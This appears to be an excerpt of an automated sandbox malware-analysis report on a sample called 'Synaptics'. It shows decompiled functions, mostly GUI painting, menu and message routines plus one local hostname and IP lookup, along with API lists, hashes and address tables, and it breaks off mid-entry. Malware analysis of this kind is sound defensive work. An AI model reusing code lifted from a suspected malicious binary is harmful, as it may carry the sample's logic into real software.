                                                                                                                                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3610532707-0
                                                                                                                                                                                                                            • Opcode ID: aa2038870a8fdccfec43aecca8dda92930077ba560af71d0df73fffac7ff7146
                                                                                                                                                                                                                            • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa2038870a8fdccfec43aecca8dda92930077ba560af71d0df73fffac7ff7146
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F3B8 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00441704(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43f4d8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043F510(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43f4df);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00441704(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                                                                                                                                                                            0x0043f3b9
                                                                                                                                                                                                                            0x0043f3bb
                                                                                                                                                                                                                            0x0043f3c1
                                                                                                                                                                                                                            0x0043f3c4
                                                                                                                                                                                                                            0x0043f3ca
                                                                                                                                                                                                                            0x0043f3cf
                                                                                                                                                                                                                            0x0043f3e3
                                                                                                                                                                                                                            0x0043f3e3
                                                                                                                                                                                                                            0x0043f3e7
                                                                                                                                                                                                                            0x0043f3e8
                                                                                                                                                                                                                            0x0043f3ed
                                                                                                                                                                                                                            0x0043f3f0
                                                                                                                                                                                                                            0x0043f3fd
                                                                                                                                                                                                                            0x0043f417
                                                                                                                                                                                                                            0x0043f41a
                                                                                                                                                                                                                            0x0043f42d
                                                                                                                                                                                                                            0x0043f430
                                                                                                                                                                                                                            0x0043f432
                                                                                                                                                                                                                            0x0043f433
                                                                                                                                                                                                                            0x0043f435
                                                                                                                                                                                                                            0x0043f440
                                                                                                                                                                                                                            0x0043f449
                                                                                                                                                                                                                            0x0043f45b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f45d
                                                                                                                                                                                                                            0x0043f479
                                                                                                                                                                                                                            0x0043f480
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f480
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f482
                                                                                                                                                                                                                            0x0043f482
                                                                                                                                                                                                                            0x0043f483
                                                                                                                                                                                                                            0x0043f483
                                                                                                                                                                                                                            0x0043f435
                                                                                                                                                                                                                            0x0043f486
                                                                                                                                                                                                                            0x0043f48a
                                                                                                                                                                                                                            0x0043f493
                                                                                                                                                                                                                            0x0043f493
                                                                                                                                                                                                                            0x0043f49e
                                                                                                                                                                                                                            0x0043f3ff
                                                                                                                                                                                                                            0x0043f406
                                                                                                                                                                                                                            0x0043f406
                                                                                                                                                                                                                            0x0043f4aa
                                                                                                                                                                                                                            0x0043f4b1
                                                                                                                                                                                                                            0x0043f4b4
                                                                                                                                                                                                                            0x0043f4b7
                                                                                                                                                                                                                            0x0043f4bc
                                                                                                                                                                                                                            0x0043f4c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f4d2
                                                                                                                                                                                                                            0x0043f4d7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0043F412
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                                                                                                                                                                                            • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3808407030-0
                                                                                                                                                                                                                            • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044AD40 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AD40(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044AD40(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044AE70(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0044AC00(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x449854; // 0x4498a0
						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                                                                                                                                                                            0x0044ad40
                                                                                                                                                                                                                            0x0044ad44
                                                                                                                                                                                                                            0x0044ad4a
                                                                                                                                                                                                                            0x0044ad54
                                                                                                                                                                                                                            0x0044ad56
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ad56
                                                                                                                                                                                                                            0x0044ad5f
                                                                                                                                                                                                                            0x0044ad64
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ad66
                                                                                                                                                                                                                            0x0044ad78
                                                                                                                                                                                                                            0x0044ad7d
                                                                                                                                                                                                                            0x0044ad81
                                                                                                                                                                                                                            0x0044ad86
                                                                                                                                                                                                                            0x0044ad8f
                                                                                                                                                                                                                            0x0044ad99
                                                                                                                                                                                                                            0x0044ada0
                                                                                                                                                                                                                            0x0044adb0
                                                                                                                                                                                                                            0x0044adb5
                                                                                                                                                                                                                            0x0044adb5
                                                                                                                                                                                                                            0x0044adb7
                                                                                                                                                                                                                            0x0044adb8
                                                                                                                                                                                                                            0x0044adbe
                                                                                                                                                                                                                            0x0044adc4
                                                                                                                                                                                                                            0x0044adf9
                                                                                                                                                                                                                            0x0044adfb
                                                                                                                                                                                                                            0x0044ae00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ae06
                                                                                                                                                                                                                            0x0044adc9
                                                                                                                                                                                                                            0x0044add6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ade9
                                                                                                                                                                                                                            0x0044aded
                                                                                                                                                                                                                            0x0044adf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044adf4
                                                                                                                                                                                                                            0x0044add6
                                                                                                                                                                                                                            0x0044adbe
                                                                                                                                                                                                                            0x0044ae0d

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                                                            • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A390 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00441704(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                                                                                                                                                                            0x0045a390
                                                                                                                                                                                                                            0x0045a394
                                                                                                                                                                                                                            0x0045a396
                                                                                                                                                                                                                            0x0045a398
                                                                                                                                                                                                                            0x0045a39a
                                                                                                                                                                                                                            0x0045a3a2
                                                                                                                                                                                                                            0x0045a441
                                                                                                                                                                                                                            0x0045a447
                                                                                                                                                                                                                            0x0045a3b3
                                                                                                                                                                                                                            0x0045a3b8
                                                                                                                                                                                                                            0x0045a3bc
                                                                                                                                                                                                                            0x0045a422
                                                                                                                                                                                                                            0x0045a43f
                                                                                                                                                                                                                            0x0045a43f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a422
                                                                                                                                                                                                                            0x0045a3be
                                                                                                                                                                                                                            0x0045a3c0
                                                                                                                                                                                                                            0x0045a3c0
                                                                                                                                                                                                                            0x0045a3c5
                                                                                                                                                                                                                            0x0045a3e0
                                                                                                                                                                                                                            0x0045a3e9
                                                                                                                                                                                                                            0x0045a3de
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a3de
                                                                                                                                                                                                                            0x0045a3f1
                                                                                                                                                                                                                            0x0045a3f3
                                                                                                                                                                                                                            0x0045a3f3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a3cf
                                                                                                                                                                                                                            0x0045a3d4
                                                                                                                                                                                                                            0x0045a3f5
                                                                                                                                                                                                                            0x0045a40e
                                                                                                                                                                                                                            0x0045a410
                                                                                                                                                                                                                            0x0045a410
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a40e
                                                                                                                                                                                                                            0x0045a3c5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCapture.USER32 ref: 0045A3B3
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A407
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0045A417
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,-0000BBEE,0049ABD1,?), ref: 0045A436
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$CaptureLongWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1158686931-0
                                                                                                                                                                                                                            • Opcode ID: f12de09e93a5b015bcf77922c91d4743cfc05ccfc7e81301400765280e2ab61c
                                                                                                                                                                                                                            • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f12de09e93a5b015bcf77922c91d4743cfc05ccfc7e81301400765280e2ab61c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00442F0C Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 22%
                                                                                                                                                                                                                            			E00442F0C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x49d970; // 0x49e900
					_t17 =  *0x49d970; // 0x49e900
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042C408();
					_v8 = _t19;
					_push(_t49);
					_push(0x442fcc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042C48C();
					_push( &_v16);
					_push(0);
					L0042C49C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042C48C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x442fd3);
					_t37 = _v8;
					_push(_t37);
					L0042C410();
					return _t37;
				}
			}

















                                                                                                                                                                                                                            0x00442f0d
                                                                                                                                                                                                                            0x00442f0f
                                                                                                                                                                                                                            0x00442f13
                                                                                                                                                                                                                            0x00442f1a
                                                                                                                                                                                                                            0x00442fd7
                                                                                                                                                                                                                            0x00442f20
                                                                                                                                                                                                                            0x00442f28
                                                                                                                                                                                                                            0x00442f34
                                                                                                                                                                                                                            0x00442f3b
                                                                                                                                                                                                                            0x00442f3d
                                                                                                                                                                                                                            0x00442f3e
                                                                                                                                                                                                                            0x00442f43
                                                                                                                                                                                                                            0x00442f48
                                                                                                                                                                                                                            0x00442f49
                                                                                                                                                                                                                            0x00442f4e
                                                                                                                                                                                                                            0x00442f51
                                                                                                                                                                                                                            0x00442f58
                                                                                                                                                                                                                            0x00442f69
                                                                                                                                                                                                                            0x00442f72
                                                                                                                                                                                                                            0x00442f83
                                                                                                                                                                                                                            0x00442f88
                                                                                                                                                                                                                            0x00442f8a
                                                                                                                                                                                                                            0x00442f8c
                                                                                                                                                                                                                            0x00442f91
                                                                                                                                                                                                                            0x00442f92
                                                                                                                                                                                                                            0x00442f9a
                                                                                                                                                                                                                            0x00442f9b
                                                                                                                                                                                                                            0x00442f9d
                                                                                                                                                                                                                            0x00442fa5
                                                                                                                                                                                                                            0x00442fa9
                                                                                                                                                                                                                            0x00442faa
                                                                                                                                                                                                                            0x00442faf
                                                                                                                                                                                                                            0x00442fb0
                                                                                                                                                                                                                            0x00442fb7
                                                                                                                                                                                                                            0x00442fba
                                                                                                                                                                                                                            0x00442fbd
                                                                                                                                                                                                                            0x00442fc2
                                                                                                                                                                                                                            0x00442fc5
                                                                                                                                                                                                                            0x00442fc6
                                                                                                                                                                                                                            0x00442fcb
                                                                                                                                                                                                                            0x00442fcb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73751AB0.COMCTL32(00000000), ref: 00442F3E
                                                                                                                                                                                                                              • Part of subcall function 0042C440: 73752140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                                                                                                                                                                                            • 73751710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                                                                                                                                                                                            • 73751F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7375173751680$7375171073752140
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3191654781-0
                                                                                                                                                                                                                            • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00472C58 Relevance: 7.6, APIs: 5, Instructions: 67networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v408;
				char _v412;
				char _v416;
				int _t30;
				char* _t38;
				signed int _t39;
				intOrPtr _t48;
				intOrPtr* _t53;
				intOrPtr _t55;
				void* _t56;
				void* _t58;

				_v416 = 0;
				_v412 = 0;
				 *[fs:eax] = _t58 + 0xfffffe64;
				_t38 = E00408D24(0x104, __eflags);
				L00472BD0();
				_v8 = E00403BBC(1);
				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
				E00404BB8( &_v412, _t38);
				_t30 = gethostname(_t38, E00404C80(_v412));
				_push(_t38);
				L00472BC0();
				if(_t30 != 0) {
					_t55 =  *((intOrPtr*)(_t30 + 0xc));
					_t39 = 0;
					while(1) {
						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
						if(_t53 == 0) {
							break;
						}
						L00472BB8();
						E00404BB8( &_v416, _t30);
						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
						_t39 = _t39 + 1;
						__eflags = _t39;
					}
					L00472BD8();
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x472d38);
				return E004049E4( &_v416, 2);
			}















                                                                                                                                                                                                                            0x00472c66
                                                                                                                                                                                                                            0x00472c6c
                                                                                                                                                                                                                            0x00472c7d
                                                                                                                                                                                                                            0x00472c8a
                                                                                                                                                                                                                            0x00472c98
                                                                                                                                                                                                                            0x00472ca9
                                                                                                                                                                                                                            0x00472cb1
                                                                                                                                                                                                                            0x00472cbc
                                                                                                                                                                                                                            0x00472cce
                                                                                                                                                                                                                            0x00472cd3
                                                                                                                                                                                                                            0x00472cd4
                                                                                                                                                                                                                            0x00472cdb
                                                                                                                                                                                                                            0x00472cdd
                                                                                                                                                                                                                            0x00472ce0
                                                                                                                                                                                                                            0x00472d07
                                                                                                                                                                                                                            0x00472d07
                                                                                                                                                                                                                            0x00472d0c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00472ce6
                                                                                                                                                                                                                            0x00472cf3
                                                                                                                                                                                                                            0x00472d03
                                                                                                                                                                                                                            0x00472d06
                                                                                                                                                                                                                            0x00472d06
                                                                                                                                                                                                                            0x00472d06
                                                                                                                                                                                                                            0x00472d0e
                                                                                                                                                                                                                            0x00472d0e
                                                                                                                                                                                                                            0x00472d15
                                                                                                                                                                                                                            0x00472d18
                                                                                                                                                                                                                            0x00472d1b
                                                                                                                                                                                                                            0x00472d30

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                                                                                                                                                                                            • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                                                                                                                                                                                            • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                                                                                                                                                                                            • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 348263315-0
                                                                                                                                                                                                                            • Opcode ID: 2597941c910caa3ba4572272bd3ca43fbff399438b71026350468ce82a15d9f1
